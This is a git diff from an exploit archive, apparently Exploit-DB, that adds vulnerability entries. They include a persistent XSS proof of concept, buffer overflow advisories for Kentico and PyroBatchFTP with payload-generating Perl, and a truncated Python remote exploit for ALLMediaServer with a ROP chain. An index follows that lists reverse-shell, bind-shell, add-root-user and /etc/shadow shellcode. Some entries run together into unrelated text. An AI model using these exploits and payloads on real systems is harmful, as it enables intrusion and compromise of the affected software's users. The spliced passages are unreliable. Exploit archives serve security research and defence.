b/exploits/linux_x86/remote/16861.rb similarity index 100% rename from exploits/lin_x86/remote/16861.rb rename to exploits/linux_x86/remote/16861.rb diff --git a/exploits/lin_x86/remote/20032.txt b/exploits/linux_x86/remote/20032.txt similarity index 100% rename from exploits/lin_x86/remote/20032.txt rename to exploits/linux_x86/remote/20032.txt diff --git a/exploits/lin_x86/remote/26737.pl b/exploits/linux_x86/remote/26737.pl similarity index 100% rename from exploits/lin_x86/remote/26737.pl rename to exploits/linux_x86/remote/26737.pl diff --git a/exploits/lin_x86/remote/269.c b/exploits/linux_x86/remote/269.c similarity index 100% rename from exploits/lin_x86/remote/269.c rename to exploits/linux_x86/remote/269.c diff --git a/exploits/lin_x86/remote/3615.c b/exploits/linux_x86/remote/3615.c similarity index 100% rename from exploits/lin_x86/remote/3615.c rename to exploits/linux_x86/remote/3615.c diff --git a/exploits/lin_x86/remote/43030.rb b/exploits/linux_x86/remote/43030.rb similarity index 100% rename from exploits/lin_x86/remote/43030.rb rename to exploits/linux_x86/remote/43030.rb diff --git a/exploits/lin_x86/remote/43031.rb b/exploits/linux_x86/remote/43031.rb similarity index 100% rename from exploits/lin_x86/remote/43031.rb rename to exploits/linux_x86/remote/43031.rb diff --git a/exploits/lin_x86/webapps/34030.txt b/exploits/linux_x86/webapps/34030.txt similarity index 100% rename from exploits/lin_x86/webapps/34030.txt rename to exploits/linux_x86/webapps/34030.txt diff --git a/exploits/php/webapps/43535.txt b/exploits/php/webapps/43535.txt new file mode 100644 index 000000000..27ebc2252 --- /dev/null +++ b/exploits/php/webapps/43535.txt @@ -0,0 +1,37 @@ +# Exploit Title: Xnami Image Sharing - Persistent XSS Vulnerability +# Google Dork: " Copyright 2017 xnami. " & 2018 +# Date: 11-01-2018 +# Exploit Author: Dennis Veninga +# Contact Author: d.veninga [at] networking4all.com +# Vendor Homepage: bizlogicdev.com +# Version: 1.0 +# CVE-ID: CVE-2018-5370 + +Xnami facilitates the creation of an image sharing community. This is +similar in +functionality to sites like imgur, ImageShack, et al. + +BizLogic xnami 1.0 has XSS via the comment parameter in an addComment +action to the /media/ajax URI. + +At any uploaded media there is a comment system where people can post (also +anonymous). +The comment system is vulnerable to XSS attacks. Since it's persistent +and there is an user login interface, it's possible for attackers to +steal sessions of users and thus admin(s). + +--------------------------- +--------------------------- +PoC with mediaId 611 as example: + +POST: +http://{{target}/media/ajax + +method: addComment +comment: ">window.location='https://www.google.com/search?q=xss'&phone=123131&status=T + +2. booking_update=1&id=3&tab_id=tabs-1&uuid=&booking_date=11-01-2018 13:06&pickup_address=&return_address=Santa Fe 1236, Rosario, Santa Fe Province, Argentina&distance=123&fleet_id=1&passengers=1&luggage=1&extra_id[]=1&sub_total=374.40&tax=37.44&total=411.84&deposit=41.18&payment_method=bank&cc_type=&cc_num=&cc_exp_month=&cc_exp_year=&cc_code=&status=cancelled&client_id=5&c_fname=asd&c_lname=asd&c_phone=12&c_email=asda&c_company=dasdasd&c_address=asda&c_city=asdasd&c_state=asdasda&c_zip=1212&c_country=&c_notes=asdad&c_airline_company=adsad&c_flight_number=adsasd&c_flight_time=13:05&c_terminal=1 + + +Severity Level: +========================================================= +High + + +Description: +========================================================== + + +Request Method(s): [+] POST & GET + + +Vulnerable Product: [+] Taxi Booking Script v1.0 + + +Vulnerable Parameter(s): [+] name, uuid, pickup_address \ No newline at end of file diff --git a/exploits/windows/dos/43547.txt b/exploits/windows/dos/43547.txt new file mode 100644 index 000000000..01bfe1a61 --- /dev/null +++ b/exploits/windows/dos/43547.txt @@ -0,0 +1,225 @@ +Document Title: +=============== +Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=1943 + +http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5282 + +CVE-ID: +======= +CVE-2018-5282 + + +Release Date: +============= +2018-01-04 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1943 + + +Common Vulnerability Scoring System: +==================================== +6 + + +Vulnerability Class: +==================== +Buffer Overflow + + +Current Estimated Price: +======================== +2.000€ - 3.000€ + + +Product & Service Introduction: +=============================== +Kentico is the only fully integrated ASP.NET CMS, E-commerce, and Online Marketing platform that allows you to create cutting-edge +websites and optimize your digital customers’ experiences fully across multiple channels. Kentico saves you time and resources so +you can accomplish more. Giving you the power to improve and refine your digital strategy, align it with the needs of your customers, +and create unique user experiences, Kentico 9 accelerates customer loyalty through new technologies. + +(Copy of the Homepage: http://www.kentico.com/product/kentico9 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a stack buffer overflow vulnerability in the official Kentico v9.0, v10.0 & v11.0 content management system software. + + +Vulnerability Disclosure Timeline: +================================== +2018-01-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Kentico Software +Product: Kentico - Content Management System (eCommerce Software) 9.0 + +Kentico Software +Product: Kentico - Content Management System (eCommerce Software) 10.0 + +Kentico Software +Product: Kentico - Content Management System (eCommerce Software) 11.0 + + +Exploitation Technique: +======================= +Local + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local stack buffer overflow vulnerability has been discovered in the official Kentico v9.0, v10.0 & v11.0 content management system software. +The buffer overflow vulnerability allows local attackers to compromise the local system process by an overwrite of the active registers. + +The local buffer overflow vulnerability is located in the `Load XML Configuration` module for file imports. The xml file impact input +data of the configuration for the software. In several values of the xml file the inputs are not recognized by an approval of the secure +software validation mechanism. The iis configuration settings are connected to a secure validation process, the sql install database +information in the xml file are not. The non-exisiting input validation and the unrestricted context size allows local attackers to +trigger a stack buffer overflow vulnerability. That results in compromise of the software process with system privileges. + +The security risk of the local buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. +Exploitation of the stack buffer overflow vulnerability requires a low privilege or restricted system user account without user interaction. +Successful exploitation of the vulnerability results in overwrite of the active registers to compromise of the computer system or process. + +Vulnerable Module(s): +[+] Load XML Configuration + + +Proof of Concept (PoC): +======================= +The local buffer overflow vulnerability can be exploited by local attackers with low privileged or restricted system user account without user interaction. +For security demonstration or to reproduce the software vulnerability follow the provided information and steps below to continue the process. + + +Manual steps to reproduce the vulnerability ... +1. Download the newst software version of the Kentico cms (v9.0.x - 9.0.5981.23486) +2. Accept the program conditions and click to custom installation +3. Open the local hosted xml poc file +4. Include a large unicode payload to the marked values +5. Save the xml file on your localhost +6. Move back to the kentico v9.x installation process with the custom install screen +Note: Attach a debugger to followup with the overwrite on the active registers +7. Load the xml poc file by usage of the import function of kentico (left|buttom) +8. The vulnerable values loaded and the process will permanently crash with different exceptions +9. Move back to the debugger that is attached to the active software process and followup with an overwrite of the active ecx, ebp or eip registers +10. Successful reproduce of the local buffer overflow vulnerability! + + +PoC: Vulnerable Source (XML) + + + + + + + + + + + + + +Note: Start the software exe file kentico v9.0 on windows, attach the windows debugger and load the xml config file to overwrite the ecx and eip registers. +The installation path and the iis website values are not exploitable, because of the active content restrictions of the process that drops an invalid +argument exception to prevent. + + +PoC: Exploit Code (XML) + + + + + + + + + + + + + + +PoC: Exploitation (Perl) +#!/usr/bin/perl +my $Buff = "A" x 3000; +open(MYFILE,'>>kentico_unicode_payload.txt'); +print MYFILE $Buff; +close(MYFILE); +print "PoC (c) Vulnerability-Laboratory"; + + +--- PoC Debug Session Logs [WinDBG] --- +(1522.21ec): Stack buffer overflow - code c0000409 +eax=00000000 ebx=0044b208 ecx=00410041 edx=513cc7c2 esi=003a22d0 edi=00477cd0 +eip=41004100 esp=00000000 ebp=00000000 iopl=0 nv up ei pl nz na po nc +cs=001c ss=0022 ds=0022 es=0022 fs=002c gs=0000 efl=00000000 +41414141 cc22 +- +EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff) +ExceptionAddress: 41414141 + ExceptionCode: c0000409 (Stack Buffer Overflow) + ExceptionFlags: 00000001 +NumberParameters: 1 + Parameter[0]: 00000002 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure file size and input character restriction like on the iis scheme website input. +Parse the full xml file on import and restrict the memory size on imports to prevent further buffer overflow attacks. + + +Security Risk: +============== +The security risk of the local stack buffer overflow vulnerability in the kentico cms software is estimated as high. (CVSS 6.0) + + +Credits & Authors: +================== +Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or +implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any +case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its +suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental +or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface +websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories +or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, +phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. \ No newline at end of file diff --git a/exploits/windows/dos/43548.txt b/exploits/windows/dos/43548.txt new file mode 100644 index 000000000..382379f04 --- /dev/null +++ b/exploits/windows/dos/43548.txt @@ -0,0 +1,85 @@ +============================================= +MGC ALERT 2018-001 +- Original release date: December 22, 2017 +- Last revised: January 12, 2018 +- Discovered by: Manuel García Cárdenas +- Severity: 7,5/10 (CVSS Base Score) +============================================= + +I. VULNERABILITY +------------------------- +PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH) + +II. BACKGROUND +------------------------- +PyroBatchFTP is a Windows software that lets you exchange files with FTP, +FTPS or SFTP servers in an automatic and unattended way, using a simple yet +powerful batch/script language. + +III. DESCRIPTION +------------------------- +The Enterprise version of PyroBatchFTP is affected by a Local Buffer +Overflow vulnerability. + +The application does not check bounds when reading the file that will +execute the script, resulting in a classic Buffer Overflow overwriting SEH +handler. + +To exploit the vulnerability only is needed create a local script to +interact with the application. + +IV. PROOF OF CONCEPT +------------------------- + +my $file= "crash.cmd"; +my $junk= "A" x 2052; +my $nseh = "BBBB"; +my $seh = "CCCC"; +open($FILE,">$file"); +print $FILE $junk.$nseh.$seh; +close($FILE); +print "File Created successfully\n"; + +V. BUSINESS IMPACT +------------------------- +Availability compromise can result from these attacks. + +VI. SYSTEMS AFFECTED +------------------------- +PyroBatchFTP <= 3.18 + +VII. SOLUTION +------------------------- +Vendor release 3.19 version +http://www.emtec.com/downloads/pyrobatchftp/pyrobatchftp319_changes.txt + +VIII. REFERENCES +------------------------- +https://www.emtec.com/pyrobatchftp/index.html + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel García Cárdenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +December 22, 2017 1: Initial release +January 12, 2018 2: Revision to send to lists + +XI. DISCLOSURE TIMELINE +------------------------- +December 22, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas +December 22, 2017 2: Send to vendor +January 12, 2018 3: Vendor fix the vulnerability and release a new version +January 12, 2018 4: Send to the Full-Disclosure lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/exploits/windows/remote/43523.py b/exploits/windows/remote/43523.py new file mode 100755 index 000000000..4774608ce --- /dev/null +++ b/exploits/windows/remote/43523.py @@ -0,0 +1,100 @@ +#!/usr/bin/python +# Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95 +# Exploit Author: Mario Kartone Ciccarelli +# Contact: https://twitter.com/Kartone +# CVE: CVE-2017-17932 +# Date: 09-01-2018 +# Thanks to PoC: https://www.exploit-db.com/exploits/43406/ +# Software link: http://www.allmediaserver.org/download +# Version: 0.95 +# Attack: Remote Code Execution +# Tested on: Windows 7 x64 Ultimate Eng SP1 +# + +import sys +import socket +import struct + +def main(): + + def create_rop_chain(): + + rop_gadgets = [ + 0x00407f5d, # POP EAX # RETN [MediaServer.exe] + 0x00797250, # ptr to &VirtualAlloc() [IAT MediaServer.exe] + 0x004061db, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MediaServer.exe] + 0x0053bc02, # XCHG EAX,ESI # RETN [MediaServer.exe] + 0x006c71f8, # POP EBP # RETN [MediaServer.exe] + 0x00449a05, # & jmp esp [MediaServer.exe] + 0x0049bbc4, # POP EBX # RETN [MediaServer.exe] + 0x00000001, # 0x00000001-> ebx + 0x00500b33, # POP EDX # RETN [MediaServer.exe] + 0x00001000, # 0x00001000-> edx + 0x006b5c67, # POP ECX # RETN [MediaServer.exe] + 0x00000040, # 0x00000040-> ecx + 0x0042365d, # POP EDI # RETN [MediaServer.exe] + 0x006def0d, # RETN (ROP NOP) [MediaServer.exe] + 0x0040710f, # POP EAX # RETN [MediaServer.exe] + 0x90909090, # nop + 0x0068c35c, # PUSHAD # RETN [MediaServer.exe] + ] + return ''.join(struct.pack(' /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,lin_x86 +13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86 +13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86 +13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86 +13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86 +13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86 +13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86 +13371,shellcodes/linux_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86 +13372,shellcodes/linux_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86 +13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86 +13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86 +13375,shellcodes/linux_x86/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 +13376,shellcodes/linux_x86/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 +13377,shellcodes/linux_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 +13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 +13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 +13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86 +13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86 +13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86 +13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86 +13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86 +13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86 +13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86 +13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86 +13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86 +13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86 +13390,shellcodes/linux_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,linux_x86 +13391,shellcodes/linux_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,linux_x86 +13392,shellcodes/linux_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,linux_x86 +13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86 +13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86 +13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86 +13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86 +13397,shellcodes/linux_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,linux_x86 +13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86 +13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86 +13400,shellcodes/linux_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,linux_x86 13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator -13402,shellcodes/lin_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,lin_x86 -13403,shellcodes/lin_x86/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 -13404,shellcodes/lin_x86/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 -13405,shellcodes/lin_x86/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 -13406,shellcodes/lin_x86/13406.c,"Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 -13407,shellcodes/lin_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 -13408,shellcodes/lin_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,lin_x86 -13409,shellcodes/lin_x86/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,lin_x86 -13410,shellcodes/lin_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,lin_x86 -13411,shellcodes/lin_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,lin_x86 -13412,shellcodes/lin_x86/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,lin_x86 -13413,shellcodes/lin_x86/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,lin_x86 -13414,shellcodes/lin_x86/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,lin_x86 -13415,shellcodes/lin_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,shellcode,lin_x86 -13416,shellcodes/lin_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,lin_x86 -13417,shellcodes/lin_x86/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,shellcode,lin_x86 -13418,shellcodes/lin_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,lin_x86 -13419,shellcodes/lin_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,lin_x86 -13420,shellcodes/lin_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,lin_x86 -13421,shellcodes/lin_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,lin_x86 -13422,shellcodes/lin_x86/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,lin_x86 -13423,shellcodes/lin_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,shellcode,lin_x86 -13424,shellcodes/lin_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,lin_x86 -13425,shellcodes/lin_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,lin_x86 -13426,shellcodes/lin_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,lin_x86 -13427,shellcodes/lin_x86/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,lin_x86 -13428,shellcodes/lin_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86 -13429,shellcodes/lin_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86 -13430,shellcodes/lin_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,lin_x86 -13431,shellcodes/lin_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,lin_x86 -13432,shellcodes/lin_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,lin_x86 -13433,shellcodes/lin_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,lin_x86 -13434,shellcodes/lin_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,lin_x86 -13435,shellcodes/lin_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,lin_x86 -13436,shellcodes/lin_x86/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,lin_x86 -13437,shellcodes/lin_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86 -13438,shellcodes/lin_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,lin_x86 -13439,shellcodes/lin_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,shellcode,lin_x86 -13440,shellcodes/lin_x86/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,shellcode,lin_x86 -13441,shellcodes/lin_x86/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,shellcode,lin_x86 -13442,shellcodes/lin_x86/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86 -13443,shellcodes/lin_x86/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 -13444,shellcodes/lin_x86/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 -13445,shellcodes/lin_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 -13446,shellcodes/lin_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 -13447,shellcodes/lin_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,lin_x86 -13448,shellcodes/lin_x86/13448.c,"Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 -13449,shellcodes/lin_x86/13449.c,"Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 -13450,shellcodes/lin_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 -13451,shellcodes/lin_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,lin_x86 -13452,shellcodes/lin_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,lin_x86 -13453,shellcodes/lin_x86/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,lin_x86 -13454,shellcodes/lin_x86/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,shellcode,lin_x86 -13455,shellcodes/lin_x86/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 -13456,shellcodes/lin_x86/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,lin_x86 -13457,shellcodes/lin_x86/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,lin_x86 -13458,shellcodes/lin_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,lin_x86 -13460,shellcodes/lin_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,lin_x86 -13461,shellcodes/lin_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,lin_x86 -13462,shellcodes/lin_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,lin_x86 